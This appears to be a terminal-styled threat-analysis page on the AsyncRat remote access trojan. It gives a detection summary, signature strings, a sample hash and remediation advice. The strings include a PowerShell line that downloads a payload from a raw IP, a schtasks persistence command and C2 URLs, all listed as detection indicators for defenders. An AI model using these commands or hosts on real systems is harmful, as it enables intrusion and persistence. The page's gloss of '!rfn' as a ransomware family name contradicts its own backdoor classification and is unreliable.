Backdoor:MSIL/AsyncRat!rfn

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Backdoor:MSIL/AsyncRat!rfn

Backdoor:MSIL/AsyncRat!rfn - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Backdoor:MSIL/AsyncRat!rfn

Classification:

Type:Backdoor

Platform:MSIL

Family:AsyncRat

Detection Type:Concrete

Known malware family with identified signatures

Suffix:!rfn

Specific ransomware family name

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Backdoor - Provides unauthorized remote access for .NET (Microsoft Intermediate Language) platform, family AsyncRat

Summary:

This is a concrete detection of Backdoor:MSIL/AsyncRat!rfn, a sophisticated Remote Access Trojan (RAT) that grants attackers full control over the infected system. It utilizes legitimate Windows processes like MSBuild.exe and COM Surrogate for execution and evasion, establishes persistence via registry keys, and communicates with command-and-control servers for data exfiltration and further malicious activities.

Severity:

Critical

VDM Static Detection:

Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

Filename: 41b2688b753738f8fe179c6517535fece2e4d22ddf52b.exe

41b2688b753738f8fe179c6517535fece2e4d22ddf52b6449635413056854cb6

17/11/2025

→VirusTotal ↓Download Sample

Remediation Steps:

Immediately isolate the affected host from the network. Conduct a thorough forensic analysis and full system scan with up-to-date security software. Remove all detected malicious files and registry entries. Verify and remove any established persistence mechanisms (e.g., Run keys). Reset all potentially compromised user credentials and consider a complete system reimage for critical assets due to the extensive capabilities of RATs.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 17/11/2025. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Backdoor:MSIL/AsyncRat!rfn - Windows Defender Threat Analysis